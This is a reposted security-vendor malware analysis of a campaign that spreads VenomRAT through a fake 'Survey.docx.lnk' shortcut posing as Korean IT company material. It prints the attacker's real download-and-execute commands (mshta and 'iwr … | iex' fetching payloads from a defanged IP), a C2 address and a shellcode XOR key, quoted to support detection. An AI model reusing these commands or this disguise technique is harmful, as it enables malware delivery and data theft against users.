Distribution of VenomRAT (AsyncRAT) Impersonating Korean IT Companies

by Prapattimynk, Wednesday, 24 January 2024 (1 month ago)
Distribution of VenomRAT (AsyncRAT) Impersonating Korean IT Companies

AhnLab SEcurity intelligence Center (ASEC) found a shortcut file (.lnk) that downloads AsyncRAT (VenomRAT). In order for the LNK file to disguise itself as a legitimate Word file, it was distributed with the name ‘Survey.docx.lnk’ inside a compressed file which also contained a legitimate text file. Above all, users need to remain vigilant, as the executable file (blues.exe) used in the attack is disguised as a Korean company’s certificate.

The overall operation process of the malware is as shown below.

Figure 1. Operation process

The compressed file is disguised as a ‘survey’ to encourage users to open it. It includes a text file and the malicious LNK file. The text file contains instructions that guide users to execute the malicious LNK file.

Figure 2. Inside the readme.txt file

The LNK file includes malicious commands and when it is executed, it runs additional script codes by connecting to an external URL through mshta.

Figure 3. LNK properties
  • Execution command
    C:WindowsSystem32WindowsPowerShellv1.0powershell.exe . $env:C:W*S*2m*h?a.*  ‘hxxp://194.33.191[.]248:7287/docx1.hta’

hxxp://194.33.191[.]248:7287/docx1.hta has obfuscated strings inside. When they are decoded, a PowerShell command can be seen. As shown in Figure 5, this command downloads additional files and saves them in the %appdata% folder before executing them.

  • Download URL
Figure 4. Part of the script code inside docx1.hta
Figure 5. Part of the decoded docx1.hta code

The downloaded qfqe.docx file is a legitimate Word document that contains survey information, which makes it hard for users to notice any malicious activities.

Figure 6. Inside qfqe.docx

The blues.exe file that is downloaded with the Word file is a downloader-type malware disguised as a Korean IT company’s certificate. When executed, it downloads additional scripts through PowerShell.

Figure 7. Signature information of blues.exe
Figure 8. Part of the blues.exe code
  • Execution command
    powershell iwr hxxp://194.33.191[.]248:7287/sys.ps1 -UseBasicParsing | iex

The sys.ps1 executed through the blues.exe file shown above is also a downloader-type malware that downloads additional data from hxxp://194.33.191[.]248:7287/adb.dll and executes it in a fileless format.

Figure 9. sys.ps1 code

adb.dll has an encoded shellcode inside, and this is decrypted by calculating the XOR of Base64 and the ‘sorootktools’ string.

Figure 10. Encoded shellcode included in the adb.dll

The ultimately executed shellcode performs keylogging and leaks user PC information with the RAT-type malware VenomRAT (AsyncRAT). It can also perform various malicious behaviors by receiving commands from the threat actor.

  • C2 : 194.33.191[.]248:4449
Figure 11. Part of the VenomRAT (AsyncRAT) code

Malicious shortcut files disguised as legitimate documents are continuously being distributed. Users can mistake the shortcut file for a normal document, as the ‘.lnk’ extension is not visible on the names of the files. Therefore, particular caution is advised.

[File Detection]
Trojan/LNK.Runner (2024.01.16.00)
Trojan/HTML.Agent.SC196238 (2024.01.17.00)
Trojan/Win.Generic.C5572807 (2024.01.12.03)
Trojan/PowerShell.Agent (2024.01.17.00)
Trojan/Win.Generic.C5337844 (2022.12.21.00)

[Behavior Detection]

[IOC Info]



Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.


Your email address will not be published. Required fields are marked *

Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.